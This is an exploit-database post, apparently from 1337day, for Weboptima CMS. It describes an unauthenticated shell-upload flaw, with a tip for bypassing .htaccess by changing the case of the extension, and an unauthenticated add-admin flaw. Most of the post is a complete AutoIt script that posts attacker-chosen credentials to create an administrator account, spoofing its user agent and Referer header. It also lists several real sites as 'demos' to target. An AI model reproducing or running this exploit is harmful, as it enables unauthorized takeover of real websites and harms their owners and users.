`#cs 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm AkaStep member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 weboptima_cms_remote_add_admin_shell_upload.au3 ============================================ Vulnerable Software: Weboptima CMS Vendor: http://weboptima.am/ Vulns: REMOTE SHELL UPLOAD AND REMOTE ARBITRARY ADD ADMIN. Both Exploits are available(HTML exploit to upload shell) And Autoit Exploit to add arbitrary admin accounts to target site. More detailts below. ============================================ Few DEMOS: http://navasards.am http://olivergroup.am http://iom.am http://bluefly.am http://invest-in-armenia.com http://decart.am http://armgeokart.am/ ============================================ About Vulns: 1'ST vulnerability is REMOTE SHELL UPLOAD: Any *UNAUTHENTICATED* USER CAN UPLOAD SHELL. Vulnerable code: //cms/upload.php =============SNIP BEGINS======================

Կցված ֆայլեր
========================SNIP ENDS================= Simple HTML exploit to upload your shell: After Successfully shell upload your shell can be found: http://site.tld/uploades/shellname.php NOTE: There may be simple .htaccess to prevent you from accessing shell(HTTP 403). This is not problem just upload your shell like: myshell.PhP or myshell.pHp OWNED. 2'nd vulnerability is: REMOTE ADD ADMIN Any UNAUTHENTICATED USER CAN ADD ARBITRARY ADMIN ACCOUNT(s) TO TARGET SITE. Vulnerable Code: //cms/loginPass.php Notice: header() without exit;Script continues it's execution. ==================SNIP BEGINS========= #include $exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _ 'Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF & _ 'Usage: ' & @ScriptName & ' http://site.tld ' & ' username ' & 'password ' & _ @CRLF & "[] DON'T HATE THE HACKER, HATE YOUR OWN CODE! []" & @CRLF & _ '[@@@] Vuln & Exploit By AkaStep [@@@]' & @CRLF & _StringRepeat('#',62); ConsoleWrite(@CRLF & $exploitname & @CRLF) $method='POST'; $vulnurl='cms/loginPass.php?test=' & Random(1,15677415,1); Global $count=0,$error=0; $cmsindent='kcaptcha'; # We will use it to identify CMS #; $adminpanel='/cms/index.php'; ;#~ Impersonate that We Are Not BOT or exploit.We are human who uses IE. Dohhh))# ~; $useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)'; $msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld ' & ' usernametoadd ' & 'passwordtoadd' & @CRLF if $CmdLine[0] <> 3 Then MsgBox(64,"",$msg_usage); ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF); exit; EndIf if $CmdLine[0]=3 Then $targetsite=$CmdLine[1]; $username=$CmdLine[2]; $password=$CmdLine[3]; EndIf if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then ConsoleWrite('Are you kidding me?'); Exit; EndIf HttpSetUserAgent($useragent) $doublecheck=InetGet($targetsite,'',1); if @error Then ConsoleWrite('[] Are you sure that site exist? Theris an error! Please Try again! []' & @CRLF) Exit; EndIf ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF); sleep(Random(1200,2500,1)); HttpSetUserAgent($useragent); $sidentify=_INetGetSource($targetsite & $adminpanel,True); if StringInStr($sidentify,$cmsindent) Then ConsoleWrite("[] GOT Response : Yes! It is exactly that we are looking for! []" & @CRLF) Else ConsoleWrite("[] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. []" & @CRLF) $error+=1; EndIf $targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','') priv8($targetsite,$username,$password,$count,$error);#~ do the magic for me plizzz));~# Func priv8($targetsite,$username,$password,$count,$error) $count+=1;~ #~ We are not going to exploit in infinitive manner xD #~; Global $sAddress = $targetsite $triptrop=@CRLF & _StringRepeat('#',50) & @CRLF; $whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF & 'To Site:' & $targetsite & @CRLF & 'With Username: ' & _ $username & @CRLF & 'With Password: ' & $password & $triptrop; if $count <=1 then ConsoleWrite($whatcurrentlywedo) $doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count:' & $error & $triptrop; ConsoleWrite($doitnicely); Global $sPostData = "login=" & $username & "&password=" & $password & "&status=1" & "&add_sub=Add+New"; if $error>=2 OR $count>=2 Then ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF) if int($error)=0 then ConsoleWrite($triptrop & '[] Yaaaaa We are Going To Travel xD []' & _ @CRLF & 'Try to login @ ' & @CRLF & _ 'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: ' & _ $username & @CRLF & 'With Password: ' & $password & @CRLF & _ 'NOTE Make Sure Your Browser Reveals HTTP REFERER!' & @CRLF & _ ' OTHERWISE YOU WILL UNABLE TO LOGIN! ' & $triptrop & '[] Exit []' & $triptrop); exit; Else ConsoleWrite($triptrop & '[] Seems Is not exploitable or Vuln Fixed? []' & @CRLF & _ '[] Anyway,try to login with new credentials. []' & @CRLF & _ '[] May be you are Lucky;) []' & _ @CRLF & 'Try to login @ ' & @CRLF & _ 'Site: ' & $targetsite & $adminpanel & @CRLF & _ 'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[] Exit []' & $triptrop); EndIf exit; EndIf Global $hOpen = _WinHttpOpen($useragent); Global $hConnect = _WinHttpConnect($hOpen, $sAddress) Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,''); _WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8") _WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5") _WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate") _WinHttpAddRequestHeaders($hRequest, "DNT: 1") _WinHttpAddRequestHeaders($hRequest, "Referer: " & $targetsite & $vulnurl);# We need it #; _WinHttpAddRequestHeaders($hRequest, "Cookie: ComeToPwnYou");#~ Not neccessary just for compatibility.Change or "rm" it if you want. #~; _WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive") _WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded") _WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData)); _WinHttpSendRequest($hRequest, -1, $sPostData) _WinHttpReceiveResponse($hRequest) Global $sHeader, $sReturned If _WinHttpQueryDataAvailable($hRequest) Then $sHeader = _WinHttpQueryHeaders($hRequest) Do $sReturned &= _WinHttpReadData($hRequest) Until @error _WinHttpCloseHandle($hRequest) _WinHttpCloseHandle($hConnect) _WinHttpCloseHandle($hOpen) $targetsite=StringMid($targetsite,5,StringLen($targetsite)) Sleep(Random(10000,20000,1)); priv8($targetsite,$username,$password,$count,$error);#~ Pass to function and TRY to Exploit #~; Else $error+=1;#~ iNCREMENT ERROR(s) COUNT. CUZ SOMETHING WENT WRONG ~#; _WinHttpCloseHandle($hRequest) _WinHttpCloseHandle($hConnect) _WinHttpCloseHandle($hOpen) $targetsite=StringMid($targetsite,5,StringLen($targetsite)) Sleep(Random(10000,20000,1)); priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~# EndIf EndFunc;=> priv8(); #cs ================================================ KUDOSSSSSSS ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org to all Aa Team + to all Azerbaijan Black HatZ + Especially to my bro CAMOUFL4G3 To All Turkish Hackers Also special thanks to: ottoman38 & HERO_AZE ================================================ /AkaStep #ce `

Query Builder